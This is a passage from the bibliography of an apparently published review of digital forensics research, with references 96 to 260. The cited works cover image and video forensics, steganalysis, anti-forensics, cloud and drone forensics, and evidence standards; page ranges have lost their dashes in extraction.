[96] H. Kaur and N. Jindal, ``Image and video forensics: A critical survey,'' Wireless Pers. Commun., vol. 112, no. 2, pp. 12811302, May 2020.
[97] M. D. Ansari, E. Rashid, S. Skandha, and S. K. Gupta, ``A comprehensive analysis of image forensics techniques: Challenges and future direction,'' Recent Patents Eng., vol. 13, pp. 110, Dec. 2019.
[98] R. C. Pandey, S. K. Singh, and K. K. Shukla, ``Passive forensics in image and video using noise features: A review,'' Digit. Invest., vol. 19, pp. 128, Dec. 2016.
[99] S. Gupta, N. Mohan, and P.
Kaushal, ``Passive image forensics using universal techniques: A review,'' Artif. Intell. Rev., vol. 2021, pp. 151, Jul. 2021.
[100] M. A. Qureshi and M. Deriche, ``A bibliography of pixel-based blind image forgery detection techniques,'' Signal Process., Image Commun., vol. 39, pp. 4674, Nov. 2015.
[101] A. R. Abrahim, M. S. M. Rahim, and G. B. Sulong, ``Literature review: Detection of image splicing forgery,'' Int. J. Appl. Eng. Res., vol. 12, no. 22, pp. 1185511861, 2017.
[102] R. Dixit and R. Naskar, ``Review, analysis and parameterisation of techniques for copy-move forgery detection in digital images,'' IET Image Process., vol. 11, no. 9, pp. 746759, Sep. 2017.
[103] S. Teerakanok and T. Uehara, ``Copy-move forgery detection: A state-of-the-art technical review and analysis,'' IEEE Access, vol. 7, pp. 4055040568, 2019.
[104] Z. Zhang, C. Wang, and X. Zhou, ``A survey on passive image copy-move forgery detection,'' J. Inf. Process. Syst., vol. 14, no. 1, pp. 631, 2018.
[105] G. K. Birajdar and V. H. Mankar, ``Digital image forgery detection using passive techniques: A survey,'' Digital Invest., vol. 10, no. 3, pp. 226245, Oct. 2013.
[106] R. R. Ali, K. M. Mohamad, S. Jamel, and S. K. A. Khalid, ``A review of digital forensics methods for JPEG file carving,'' J. Theor. Appl. Inf. Technol., vol. 96, no. 17, pp. 58415856, 2018.
[107] M. J. Khan, H. S. Khan, A. Yousaf, K. Khurshid, and A. Abbas, ``Modern trends in hyperspectral image analysis: A review,'' IEEE Access, vol. 6, pp. 1411814129, 2018.
[108] P. Korus, ``Digital image integrity: A survey of protection and verification techniques,'' Digit. Signal Process., vol. 71, pp. 126, Dec. 2017.
[109] T. Julliand, V. Nozick, and H. Talbot, ``Image noise and digital image forensics,'' in Proc. Int. Workshop Digit. Watermarking. Cham, Switzerland: Springer, 2015, pp. 317.
[110] S. Chutani and A. Goyal, ``A review of forensic approaches to digital image steganalysis,'' Multimedia Tools Appl., vol. 78, no. 13, pp. 1816918204, Jul. 2019.
[111] K. Karampidis, E. Kavallieratou, and G. Papadourakis, ``A review of image steganalysis techniques for digital forensics,'' J. Inf. Secur. Appl., vol. 40, pp. 217235, Jun. 2018.
[112] X. Luo, F. Liu, S. Lian, C. Yang, and S. Gritzalis, ``On the typical statistic features for image blind steganalysis,'' IEEE J. Sel. Areas Commun., vol. 29, no. 7, pp. 14041422, Aug. 2011.
[113] P. Yang, D. Baracchi, R. Ni, Y. Zhao, F. Argenti, and A. Piva, ``A survey of deep learning-based source image forensics,'' J. Imag., vol. 6, no. 3, p. 9, Mar. 2020.
[114] M. Dalal and M. Juneja, ``Steganography and steganalysis (in digital forensics): A cybersecurity guide,'' Multimedia Tools Appl., vol. 80, no. 4, pp. 57235771, Feb. 2021.
[115] V. N. L. Franqueira, J. Bryce, N. Al Mutawa, and A. Marrington, ``Investigation of indecent images of children cases: Challenges and suggestions collected from the trenches,'' Digit. Invest., vol. 24, pp. 95105, Mar. 2018.
[116] L. Sanchez, C. Grajeda, I. Baggili, and C. Hall, ``A practitioner survey exploring the value of forensic tools, AI, filtering, & safer presentation for investigating child sexual abuse material (CSAM),'' Digit. Invest., vol. 29, pp. S124S142, Jul. 2019.
[117] J. Cifuentes, A. L. S. Orozco, and L. J. G.
Villalba, ``A survey of artificial intelligence strategies for automatic detection of sexually explicit videos,'' Multimedia Tools Appl., vol. 39, pp. 118, Nov. 2021.
[118] K. V. Açar, ``OSINT by crowdsourcing: A theoretical model for online child abuse investigations,'' Int. J. Cyber Criminol., vol. 12, no. 1, pp. 206229, 2018.
[119] E. Nowroozi, A. Dehghantanha, R. M. Parizi, and K.-K.-R. Choo, ``A survey of machine learning techniques in adversarial image forensics,'' Comput. Secur., vol. 100, Jan. 2021, Art. no. 102092.
[120] M. Dalal and M. Juneja, ``Video steganalysis to obstruct criminal activities for digital forensics: A survey,'' Int. J. Electron. Secur. Digit. Forensics, vol. 10, no. 4, pp. 338355, 2018.
[121] S. Kingra, N. Aggarwal, and R. D. Singh, ``Video inter-frame forgery detection: A survey,'' Indian J. Sci. Technol., vol. 9, no. 44, Nov. 2016.
[122] N. A. Shelke and S. S. Kasana, ``A comprehensive survey on passive techniques for digital video forgery detection,'' Multimedia Tools Appl., vol. 80, no. 4, pp. 62476310, Feb. 2021.
[123] A. S. Shahraki, H. Sayyadi, M. H. Amri, and M. Nikmaram, ``Survey: Video forensic tools,'' J. Theor. Appl. Inf. Technol., vol. 47, no. 1, pp. 98107, 2013.
[124] M. Alsmirat, R. Al-Hussien, W. Al-Sarayrah, Y. Jararweh, and M. Etier, ``Digital video forensics: A comprehensive survey,'' Int. J. Adv. Intell. Paradigms, vol. 15, no. 4, pp. 437456, 2020.
[125] F. Becerra-Riera, A. Morales-González, and H. Méndez-Vázquez, ``A survey on facial soft biometrics for video surveillance and forensic applications,'' Artif. Intell. Rev., vol. 52, no. 2, pp. 11551187, Aug. 2019.
[126] S. T and S. M. Thampi, ``Nighttime visual refinement techniques for surveillance video: A review,'' Multimedia Tools Appl., vol. 78, no. 22, pp. 3213732158, Nov. 2019.
[127] R. D. Singh and N. Aggarwal, ``Video content authentication techniques: A comprehensive survey,'' Multimedia Syst., vol. 24, no. 11, pp. 211240, Mar. 2018.
[128] M. Zakariah, M. K. Khan, and H. Malik, ``Digital multimedia audio forensics: Past, present and future,'' Multimedia Tools Appl., vol. 77, no. 1, pp. 10091040, Jan. 2018.
[129] K. Conlan, I. Baggili, and F. Breitinger, ``Anti-forensics: Furthering digital forensic science through a new extended, granular taxonomy,'' Digit. Invest., vol. 18, pp. S66S75, Aug. 2016.
[130] M. A. Qureshi and E. M. El-Alfy, ``Bibliography of digital image anti-forensics and anti-anti-forensics techniques,'' IET Image Process., vol. 13, no. 11, pp. 18111823, Sep. 2019.
[131] F. Guibernau, ``Catch me if you can! Detecting sandbox evasion techniques,'' in Proc. USENIX Assoc., San Francisco, CA, USA, Jan. 2020.
[132] P. Chen, C. Huygens, L. Desmet, and W. Joosen, ``Advanced or not? A comparative study of the use of anti-debugging and anti-VM techniques in generic and targeted malware,'' in Proc. IFIP Int. Conf. ICT Syst. Secur. Privacy Protection. Cham, Switzerland: Springer, 2016, pp. 323336.
[133] A. Bulazel and B. Yener, ``A survey on automated dynamic malware analysis evasion and counter-evasion: PC, mobile, and Web,'' in Proc. 1st Reversing Offensive-oriented Trends Symp. (ROOTS), 2017, pp. 121.
[134] R. R. Branco, G. N. Barbosa, and P. D. Neto, ``Scientific but not academical overview of malware anti-debugging, anti-disassembly and anti-VM technologies,'' Black Hat, vol. 1, pp. 127, Jul. 2012.
[135] R. Harris, ``Arriving at an anti-forensics consensus: Examining how to define and control the anti-forensics problem,'' Digit. Invest., vol. 3, pp. 4449, Sep.
2006.
[136] S. Alharbi, J. Weber-Jahnke, and I. Traore, ``The proactive and reactive digital forensics investigation process: A systematic literature review,'' in Information Security and Assurance, T.-H. Kim, H. Adeli, R. J. Robles, and M. Balitanas, Eds. Berlin, Heidelberg: Springer, 2011, pp. 87100.
[137] A. Al-Dhaqm, R. A. Ikuesan, V. R. Kebande, S. Razak, and F. M. Ghabban, ``Research challenges and opportunities in drone forensics models,'' Electronics, vol. 10, no. 13, p. 1519, Jun. 2021.
[138] G. Horsman, ``Unmanned aerial vehicles: A preliminary analysis of forensic challenges,'' Digit. Invest., vol. 16, pp. 111, Mar. 2016.
[139] S. Atkinson, G. Carr, C. Shaw, and S. Zargari, Drone Forensics: The Impact and Challenges. Cham, Switzerland: Springer, 2021, pp. 65124.
[140] F. Adelstein, ``Live forensics: Diagnosing your system without killing it first,'' Commun. ACM, vol. 49, no. 2, pp. 6366, Feb. 2006.
[141] A. Renduchintala, F. Jahan, R. Khanna, and A. Y. Javaid, ``A comprehensive micro unmanned aerial vehicle (UAV/drone) forensic framework,'' Digit. Invest., vol. 30, pp. 5272, Sep. 2019.
[142] E. Mantas and C. Patsakis, ``Who watches the new watchmen? The challenges for drone digital forensics investigations,'' arXiv preprint arXiv:2021.12640, 2021.
[143] M. Keyvanpour, M. Moradi, and F. Hasanzadeh, ``Digital forensics 2.0,'' in Computational Intelligence in Digital Forensics: Forensic Investigation and Applications. Cham, Switzerland: Springer, 2014, pp. 1746.
[144] T. Sangkaran, A. Abdullah, and N. Z. JhanJhi, ``Criminal network community detection using graphical analytic methods: A survey,'' EAI Endorsed Trans. Energy Web, vol. 7, no. 26, pp. 115, 2020.
[145] G. De La T. Parra, P. Rad, and K.-K. R. Choo, ``Implementation of deep packet inspection in smart grids and industrial Internet of Things: Challenges and opportunities,'' J. Netw. Comput. Appl., vol. 135, pp. 3246, Jun. 2019.
[146] E. Batista, M. A. Moncusi, P. López-Aguilar, A. Martínez-Ballesté, and A. Solanas, ``Sensors for context-aware smart healthcare: A security perspective,'' Sensors, vol. 21, no. 20, p. 6886, Oct. 2021.
[147] G. Ahmadi-Assalemi, H. Al-Khateeb, G. Epiphaniou, and C. Maple, ``Cyber resilience and incident response in smart cities: A systematic literature review,'' Smart Cities, vol. 3, no. 3, pp. 894927, Aug. 2020.
[148] S. Garfinkel, P. Farrell, V. Roussev, and G. Dinolt, ``Bringing science to digital forensics with standardized forensic corpora,'' Digit. Invest., vol. 6, pp. S2S11, Sep. 2009. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S1742287609000346
[149] C. Grajeda, F. Breitinger, and I. Baggili, ``Availability of datasets for digital forensics - and what is missing,'' Digit. Invest., vol. 22, pp. S94S105, Aug. 2017. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S1742287617301913
[150] M. Köhn, M. S. Olivier, and J. H. Eloff, ``Framework for a digital forensic investigation,'' in Proc. ISSA, 2006, pp. 17.
[151] W. Halboob and R. Mahmod, ``State of the art in trusted computing forensics,'' in Future Information Technology, Application, and Service. Dordrecht, The Netherlands: Springer, 2012, pp. 249258.
[152] M. D. Kohn, M. M. Eloff, and J. H. P. Eloff, ``Integrated digital forensic process model,'' Comput. Secur., vol. 38, pp. 103115, Oct. 2013.
[153] H. I. Bulbul, H. G. Yavuzcan, and M. Ozel, ``Digital forensics: An analytical crime scene procedure model (ACSPM),'' Forensic Sci. Int., vol. 233, nos. 13, pp. 244256, Dec. 2013.
[154] A. Agarwal, M. Gupta, S. Gupta, and S. C. Gupta, ``Systematic digital forensic investigation model,'' Int. J. Comput. Sci. Secur., vol. 5, no. 1, pp. 118131, 2011.
[155] R. Adams, V. Hobbs, and G. Mann, ``The advanced data acquisition model (Adam): A process model for digital forensic practice,'' J. Digit. Forensics, Secur. Law, vol. 8, no. 4, pp. 2548, 2013.
[156] J. Williams, ``ACPO good practice guide for digital evidence,'' Metrop. Police Service, Assoc. Chief Police Officers, GB, Tech. Rep., 2012.
[157] K. Kent, S. Chevalier, T. Grance, and H. Dang, ``SP 800-86. Guide to integrating forensic techniques into incident response,'' Nat. Inst. Standards Technol., Gaithersburg, MD, USA, Tech. Rep., 2006.
[158] W. G. Kruse II and J. G. Heiser, Computer Forensics: Incident Response Essentials. London, U.K.: Pearson, 2001.
[159] M. Reith, C. Carr, and G. Gunsch, ``An examination of digital forensic models,'' Int. J. Digit. Evidence, vol. 1, no. 3, pp. 112, 2002.
[160] B. Carrier and E. H. Spafford, ``Getting physical with the investigative process,'' Int. J. Digit. Evidence, 2003.
[161] V. Baryamureeba and F. Tushabe, ``The enhanced digital investigation process model,'' Digit. Invest., 2004.
[162] S. Ó Ciardhuáin, ``An extended model of cybercrime investigations,'' International Journal of Digital Evidence, vol. 3, no. 1, pp. 122, 2004.
[163] I. O, D. Chris, and D. David, ``A new approach of digital forensic model for digital forensic investigation,'' Int. J. Adv. Comput. Sci. Appl., vol. 2, no. 12, pp. 175178, 2011.
[164] (2020). European Network of Forensic Science Institutes. Forensic Guidelines. [Online]. Available: http://enfsi.eu/documents/forensic-guidelines/
[165] Y. Yusoff, R. Ismail, and Z. Hassan, ``Common phases of computer forensics investigation models,'' Int. J. Comput. Sci. Inf. Technol., vol. 3, no. 3, pp. 1731, 2011.
[166] K. Kyei, P. Zavarsky, D. Lindskog, and R. Ruhl, ``A review and comparative study of digital forensic investigation models,'' in Digital Forensics and Cyber Crime, M. Rogers and K. C. Seigfried-Spellar, Eds. Berlin, Germany: Springer, 2013, pp. 314327.
[167] S. Bonomi, M. Casini, and C. Ciccotelli, ``B-CoC: A blockchain-based chain of custody for evidences management in digital forensics,'' 2018, arXiv:1807.10359.
[168] Z. Tian, M. Li, M. Qiu, Y. Sun, and S. Su, ``Block-DEF: A secure digital evidence framework using blockchain,'' Inf. Sci., vol. 491, pp. 151165, Jul. 2019.
[169] R. S. Greenfield et al., Cyber Forensics: A Field Manual for Collecting, Examining, and Preserving Evidence of Computer Crimes. Boca Raton, FL, USA: CRC Press, 2002.
[170] D. Reilly, C. Wren, and T. Berry, ``Cloud computing: Forensic challenges for law enforcement,'' in Proc. Int. Conf. Internet Technol. Secured Trans., Nov. 2010, pp. 17.
[171] S. L. Garfinkel, ``Digital forensics research: The next 10 years,'' Digital Investigation, vol. 7, pp. S64S73, Aug. 2010.
[172] A. Guarino, ``Digital forensics as a big data challenge,'' in ISSE Securing Electronic Business Processes. Wiesbaden, Germany: Springer, 2013, pp. 197203.
[173] G. Mohay, ``Technical challenges and directions for digital forensics,'' in Proc. 1st Int. Workshop Systematic Approaches to Digit. Forensic Eng. (SADFE), Nov. 2005, pp. 155161.
[174] Z. Li, Q. A. Chen, R. Yang, Y. Chen, and W.
Ruan, ``Threat detection and investigation with system-level provenance graphs: A survey,'' Comput. Secur., vol. 106, Jul. 2021, Art. no. 102282.
[175] A. Al-Dhaqm, S. A. Razak, R. A. Ikuesan, V. R. Kebande, and K. Siddique, ``A review of mobile forensic investigation process models,'' IEEE Access, vol. 8, pp. 173359173375, 2020.
[176] M. Abulaish and N. A. H. Haldar, ``Advances in digital forensics frameworks and tools: A comparative insight and ranking,'' Int. J. Digit. Crime Forensics, vol. 10, no. 2, pp. 95119, 2018.
[177] R. Agarwal and S. Kothari, ``Review of digital forensic investigation frameworks,'' in Information Science and Applications (Lecture Notes in Electrical Engineering), vol. 339. Berlin, Germany: Springer-Verlag, 2015, pp. 561571.
[178] P. Amann and J. I. James, ``Designing robustness and resilience in digital investigation laboratories,'' Digit. Invest., vol. 12, pp. S111S120, Mar. 2015.
[179] R. Montasari, ``An ad hoc detailed review of digital forensic investigation process models,'' Int. J. Electron. Secur. Digit. Forensics, vol. 8, no. 3, pp. 205223, 2016.
[180] R. Sabillon, J. Serra-Ruiz, V. Cavaller, and J. J. Cano, ``Digital forensic analysis of cybercrimes: Best practices and methodologies,'' Int. J. Inf. Secur. Privacy, vol. 11, no. 2, pp. 2537, 2017.
[181] Information Technology - Security Techniques - Guidelines for Identification, Collection, Acquisition and Preservation of Digital Evidence, Joint Technical Committee ISO/IEC JTC, International Organization for Standardization, Geneva, CH, Standard ISO/IEC 27037:2012, 2012. [Online]. Available: https://www.iso.org/standard/44381.html
[182] European Telecommunications Standards Institute. (2020). Techniques for Assurance of Digital Material Used in Legal Proceedings - ETSI TS 103 643 v1.1.1 (2020-01). [Online]. Available: https://www.etsi.org/deliver/etsi_ts/103600_103699/103643/01.01.01_60/ts_103643v010101p.pdf
[183] K. Kent, S. Chevalier, T. Grance, and H. Dang, ``SP 800-86. Guide to integrating forensic techniques into incident response,'' Nat. Inst. Standards Technol., Tech. Rep., 2006.
[184] R. Ayers, S. Brothers, and W. Jansen. (May 2014). Guidelines on Mobile Device Forensics. [Online]. Available: https://csrc.nist.gov/publications/detail/sp/800-101/rev-1/final
[185] L. Wilson-Wilde, ``The international development of forensic science standards - A review,'' Forensic Sci. Int., vol. 288, pp. 19, Jul. 2018.
[186] M. Robinson. (2015). Digital Forensics Workbook: Hands-on Activities in Digital Forensics. CreateSpace Independent Publishing Platform. [Online]. Available: https://books.google.gr/books?id=4dyHjgEACAAJ
[187] J. Tan, Forensic Readiness. Cambridge, MA, USA: Stake, 2001, pp. 123.
[188] K. Reddy and H. S. Venter, ``The architecture of a digital forensic readiness management system,'' Comput. Secur., vol. 32, pp. 7389, Feb. 2013.
[189] M. Elyas, A. Ahmad, S. B. Maynard, and A. Lonie, ``Digital forensic readiness: Expert perspectives on a theoretical framework,'' Comput. Secur., vol. 52, pp. 7089, Jul. 2015.
[190] B. Endicott-Popovsky, N. Kuntze, and C. Rudolph, ``Forensic readiness: Emerging discipline for creating reliable and secure digital evidence,'' J. Harbin Inst. Technol., vol. 22, no. 1, pp. 18, 2015.
[191] A. Mouhtaropoulos, C. T. Li, and M. Grobler, ``Digital forensic readiness: Are we there yet?'' J. Int. Commercial Law Technol., vol. 9, no. 3, pp. 173179, 2014.
[192] A. M. Marshall and R. Paige, ``Requirements in digital forensics method definition: Observations from a U.K.
study,'' Digit. Invest., vol. 27, pp. 2329, Dec. 2018. [193] V. S. Harichandran, F. Breitinger, I. Baggili, and A. Marrington, ``A cyber forensics needs analysis survey: Revisiting the domain's needs a decade later,'' Comput. Secur., vol. 57, pp. 113, Mar. 2016. [194] M. Ozel, H. I. Bulbul, H. G. Yavuzcan, and O. F. Bay, ``An analytical analysis of Turkish digital forensics,'' Digit. Invest., vol. 25, pp. 5569, Jun. 2018. [195] S. Park, N. Akatyev, Y. Jang, J. Hwang, D. Kim, W. Yu, H. Shin, C. Han, and J. Kim, ``A comparative study on data protection legislations and gov- ernment standards to implement digital forensic readiness as mandatory requirement,'' Digit. Invest., vol. 24, pp. S93S100, Mar. 2018. [196] H. Arshad, A. B. Jantan, and O. I. Abiodun, ``Digital forensics: Review of issues in scienti c validation of digital evidence,'' J. Inf. Process. Syst., vol. 14, no. 2, pp. 346376, 2018. [197] A. Butler and K.-K.-R. Choo, ``IT standards and guides do not adequately prepare IT practitioners to appear as expert witnesses: An Australian perspective,'' Secur. J., vol. 29, no. 2, pp. 306325, Apr. 2016. [198] A. S. Bali, G. Edmond, K. N. Ballantyne, R. I. Kemp, and K. A. Martire, ``Communicating forensic science opinion: An examination of expert reporting practices,'' Sci. Justice, vol. 60, no. 3, pp. 216224, May 2020. [199] L. M. Howes and N. Kemp, ``Discord in the communication of forensic science: Can the science of language help foster shared understanding?'' J. Lang. Social Psychol., vol. 36, no. 1, pp. 96111, Jan. 2017. [200] L. M. Howes, K. P. Kirkbride, S. F. Kelty, R. Julian, and N. Kemp, ``The readability of expert reports for non-scientist report-users: Reports of forensic comparison of glass,'' Forensic Sci. Int., vol. 236, pp. 5466, Mar. 2014. [201] L. M. Howes, K. P. Kirkbride, S. F. Kelty, R. Julian, and N. Kemp, ``Foren- sic scientists' conclusions: How readable are they for non-scientist report- users?'' Forensic Sci. Int., vol. 231, nos. 13, pp. 102112, Sep. 2013. 25490 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews [202] M. A. K. Halliday, ``Some grammatical problems in scienti c English,'' Genre Systemic Funct. Stud., vol. 6, pp. 1337, Jan. 1989. [203] S. Eggins, Introduction to Systemic Functional Linguistics . A&C Black, 2004. [204] R. Flesch, ``A new readability yardstick,'' J. Appl. Psychol., vol. 32, no. 3, p. 221, 1948. [205] R. Flesch and A. J. Gould, The Art Readable Writing, vol. 8. New York, NY, USA: Harper, 1949. [206] J. P. Kincaid, R. P. Fishburne, Jr., R. L. Rogers, and B. S. Chissom, ``Derivation of new readability formulas (automated readability index, fog count and esch reading ease formula) for navy enlisted personnel,'' Naval Tech. Training Command Millington TN Res. Branch, Tech. Rep., 1975. [207] R. Clerehan, R. Buchbinder, and J. Moodie, ``A linguistic framework for assessing the quality of written patient information: Its use in assessing methotrexate information for rheumatoid arthritis,'' Health Educ. Res., vol. 20, no. 3, pp. 334344, Jun. 2005. [208] P. B. Mosenthal and I. S. Kirsch, ``A new measure for assessing document complexity: The pmose/ikirsch document readability formula,'' J. Adoles- cent Adult Literacy, vol. 41, no. 8, pp. 638657, 1998. [209] J. L. Calder n, E. Fleming, M. R. Gannon, S.-C. Chen, J. A. Vassalotti, and K. C. 
Norris, ``Applying an expanded set of cognitive design principles to formatting the kidney early evaluation program (KEEP) longitudinal survey,'' Amer. J. Kidney Diseases, vol. 51, no. 4, pp. S83S92, Apr. 2008. [210] M. Graves and B. Graves, ``Assessing text dif culty and accessibility,'' inScaffolding Reading Experiences: Designs for Student Success . Nor- wood, MA, USA: Christopher-Gordon, 2003. [211] J. Cosic, ``Formal acceptability of digital evidence,'' in Multimedia Foren- sics and Security. Cham, Switzerland: Springer, 2017, pp. 327348. [212] O. Sallavaci and C. George, ``Procedural aspects of the new regime for the admissibility of expert evidence: What the digital forensic expert needs to know,'' Int. J. Electron. Secur. Digit. Forensics, vol. 5, nos. 34, pp. 161171, 2013. [213] P. Sommer, ``Certi cation, registration and assessment of digital forensic experts: The U.K. experience,'' Digit. Invest., vol. 8, no. 2, pp. 98105, Nov. 2011. [214] D. Garrie. (2016). The Neutral Corner: Understanding a Digital Foren- sics Report . [Online]. Available: https://www.legalexecutiveinstitute. com/understanding-digital-forensics% -report/ [215] H. Bariki, M. Hashmi, and I. Baggili, ``De ning a standard for report- ing digital evidence items in computer forensic tools,'' in Proc. Int. Conf. Digit. Forensics Cyber Crime. Berlin, Germany: Springer, 2010, pp. 7895. [216] N. M. Karie, V. R. Kebande, H. S. Venter, and K.-K.-R. Choo, ``On the importance of standardising the process of generating digital forensic reports,'' Forensic Sci. Int., Rep., vol. 1, Nov. 2019, Art. no. 100008. [217] D. Klitou, ``Privacy by design and privacy-invading technologies: Safe- guarding privacy, liberty and security in the 21st century,'' Legisprudence, vol. 5, no. 3, pp. 297329, 2011. [218] N. Daniels, ``Justice, health, and healthcare,'' Amer. J. Bioethics, vol. 1, no. 2, pp. 216, Feb. 2001. [219] M. Neocleous, ``Security, liberty and the myth of balance: Towards a critique of security politics,'' Contemp. Political Theory, vol. 6, no. 2, pp. 131149, May 2007. [220] (2004). Council of Europe. Details of treaty no. 185 . [Online]. Available: https://www.coe.int/en/web/conventions/full-list/- /conventions/treaty/1% 85 [221] (1962). C. of Europe. Details of Treaty no. 030. [Online]. Available: https://www.coe.int/en/web/conventions/full-list/- /conventions/treaty/0% 30 [222] (2013). C. of Europe. Data Protection and Cybercrime Division, Electronic Evidence Guide. [Online]. Available: https://rm.coe.int/16803028af [223] (2018). C. of Europe. Towards a Protocol to the Budapest Con- vention. [Online]. Available: https://rm.coe.int/t-cy-pd-pubsummary- v6/1680795713 [224] (2016). E. Union. Directive (EU) 2016/680 of the European Parliament and of the Council. [Online]. Available: https://eur-lex.europa.eu/legal- content/EN/TXT/?uri=CELEX%3A32016L0680 [225] E. Union. (2014). Regulation (EU) no 910/2014, of the European Parliament and of the Council. [Online]. Available: https://eur- lex.europa.eu/legal-content/EN/TXT/?uri=uriserv%3AOJ.L_.201% 4.257.01.0073.01.ENG[226] (2019). European Commission. E-evidenceCross-Border Access to Electronic Evidence. [Online]. Available: https://ec.europa.eu/info/ policies/justice-and-fundamental-rights/crimi%nal-justice/e-evidence- cross-border-access-electronic-evidence_en [227] (2016). European Union. Regulation (EU) 2016/95 of the Euro- pean Parliament and of the Council. [Online]. Available: https://eur- lex.europa.eu/legal-content/EN/TXT/?uri=CELEX%3A32016R0095 [228] (2017). E. Union. 
Final Report SummaryEuropean Informatics Data Exchange Framework for Courts and Evidence. [Online]. Available: https://cordis.europa.eu/project/id/608185/reporting [229] F. Insa, ``The admissibility of electronic evidence in court (A.E.E.C.): Fighting against high-tech crimeResults of a European study,'' J. Digit. Forensic Pract., vol. 1, no. 4, pp. 285289, Jun. 2007. [230] M. A. Biasiotti, J. P. M. Bonnici, J. Cannataci, and F. Turchi, Handling and Exchanging Electronic Evidence Across Europe. vol. 39. Cham, Switzerland: Springer, 2018. [231] Electronic EvidenceA basic Guide for First Responders, Eur. Netw. Inf. Secur. Agency (ENISA), Athens, Greece, 2015. [232] R. Marty, ``Cloud application logging for forensics,'' in Proc. ACM Symp. Appl. Comput. (SAC), 2011, pp. 178184. [233] P. Trenwith and H. Venter, ``Digital forensic readiness in the cloud,'' in Proc. IEEE Information Security for South Africa, 2013, pp. 15. [234] A. Patrascu and V.-V. Patriciu, ``Logging system for cloud computing forensic environments,'' J. Control Eng. Appl. Informat., vol. 16, no. 1, pp. 8088, 2014. [235] V. Kebande and H. Venter, ``A functional architecture for cloud forensic readiness large-scale potential digital evidence analysis,'' in Proc. Eur. Conf. Cyber Warfare Secur., 2015, p. 373. [236] S. Zawoad, A. K. Dutta, and R. Hasan, ``Towards building foren- sics enabled cloud through secure logging-as-a-service,'' IEEE Trans. Depend. Sec. Comput., vol. 13, no. 2, pp. 148162, Mar./Apr. 2016. [237] M. A. M. Ahsan, A. W. B. A. Wahab, M. Y. I. B. Idris, S. Khan, E. Bachura, and K.-K.-R. Choo, ``CLASS: Cloud log assuring soundness and secrecy scheme for cloud forensics,'' IEEE Trans. Sustain. Comput., vol. 6, no. 2, pp. 184196, Apr. 2021. [238] H. Tian, J. Wang, C.-C. Chang, and H. Quan, ``Public auditing of log integrity for shared cloud storage systems via blockchain,'' Wireless Netw., vol. 2020, pp. 378387, May 2020. [239] F. Casino, E. Politou, E. Alepis, and C. Patsakis, ``Immutability and decentralized storage: An analysis of emerging threats,'' IEEE Access, vol. 8, pp. 47374744, 2020. [240] V. R. Kebande, R. A. Ikuesan, and N. M. Karie, ``Review of blockchain forensics challenges,'' in Blockchain Security in Cloud Computing. Cham, Switzerland: Springer, 2022, pp. 3350. [241] S. T. Ali, P. McCorry, P. H.-J. Lee, and F. Hao, ``ZombieCoin 2.0: Man- aging next-generation botnets using bitcoin,'' Int. J. Inf. Secur., vol. 17, no. 4, pp. 411422, Aug. 2018. [242] C. Patsakis and F. Casino, ``Hydras and IPFS: A decentralised play- ground for malware,'' Int. J. Inf. Secur., vol. 18, no. 6, pp. 787799, Dec. 2019. [243] (2020). O. Caspi. Trickbot Bazarloader in-Depth [Online]. Available: https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-% in-depth [244] F. Casino, N. Lykousas, V. Katos, and C. Patsakis, ``Unearthing malicious campaigns and actors from the blockchain DNS ecosystem,'' Comput. Commun., vol. 179, pp. 217230, Nov. 2021. [245] T. de Balthasar and J. Hernandez-Castro, ``An analysis of bitcoin laun- dry services,'' in Secure IT Systems (Lecture Notes in Computer Sci- ence), H. Lipmaa, A. Mitrokotsa, and R. Matulevicius, Eds., vol. 10674. Springer, 2017, pp. 297312, doi: 10.1007/978-3-319-70290-2_18. [246] G. Kumar, R. Saha, C. Lal, and M. Conti, ``Internet-of-forensic (IoF): A blockchain based digital forensics framework for iot applications,'' Future Gener. Comput. Syst., vol. 120, pp. 1325, 2021. [247] (2019). LOCARD: Lawful Evidence Collecting and Continuity Platform Development. 
[Online]. Available: https://locard.eu [248] L. Zarpala and F. Casino, ``A blockchain-based forensic model for nan- cial crime investigation: The embezzlement scenario,'' Digit. Finance, vol. 3, no. 3, pp. 132, 2021. [249] T. Li, A. K. Sahu, A. Talwalkar, and V. Smith, ``Federated learning: Challenges, methods, and future directions,'' IEEE Signal Process. Mag. , vol. 37, no. 3, pp. 5060, May 2020. [250] Q. Yang, Y. Liu, T. Chen, and Y. Tong, ``Federated machine learning: Concept and applications,'' ACM Trans. Intell. Syst. Technol., vol. 10, no. 2, pp. 119, 2019. VOLUME 10, 2022 25491 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews [251] L. Ogiela and M. R. Ogiela, ``Cognitive security paradigm for cloud computing applications,'' Concurrency Comput., Pract. Exper., vol. 32, no. 8, p. e5316, Apr. 2020. [252] K. Demertzis, P. Kikiras, N. Tziritas, S. Sanchez, and L. Iliadis, ``The next generation cognitive security operations center: Network ow forensics using cybersecurity intelligence,'' Big Data Cognit. Comput., vol. 2, no. 4, p. 35, Nov. 2018. [253] S. Schuster, M. van den Berg, X. Larrucea, T. Slewe, and P. Ide-Kostic, ``Mass surveillance and technological policy options: Improving security of private communications,'' Comput. Standards Interfaces, vol. 50, pp. 7682, Feb. 2017. [254] D. J. Bernstein, T. Lange, and R. Niederhagen, ``Dual EC: A standardized back door,'' in The New Codebreakers. Berlin, Germany: Springer, 2016, pp. 256281. [255] M. Smith and M. Green, ``A discussion of surveillance backdoors: Effec- tiveness, collateral damage and ethics,'' in Proc. Int. Secur. 21st Century, Germany's Int. Responsibility, 2016, pp. 131142. [256] E. Rice, ``The second amendment and the struggle over cryptography,'' Hastings Sci. Tech. LJ, vol. 9, p. 29, Oct. 2017. [257] A. M. Dunn, O. S. Hofmann, B. Waters, and E. Witchel, ``Cloaking malware with the trusted platform module,'' inProc. 20th USENIX Secur. Symp. (USENIX Security), San Francisco, CA, USA, Aug. 2011, pp. 116. [Online]. Available: https://www.usenix.org/conference/usenix-security-11/cloaking- malware-t% rusted-platform-module [258] A. Adadi and M. Berrada, ``Peeking inside the black-box: A sur- vey on explainable arti cial intelligence (XAI),'' IEEE access, vol. 6, pp. 5213852160, 2018. [259] (2020). The European Union Agency for Cybersecurity (ENISA). Guideline on Security Measures Under the EECC. [Online]. Available: https://www.enisa.europa.eu/publications/guideline-on-security- measures% -under-the-eecc/ [260] (2020). The European Union Agency for Cybersecurity (ENISA). 5G supplementTo the Guideline on Security Measures 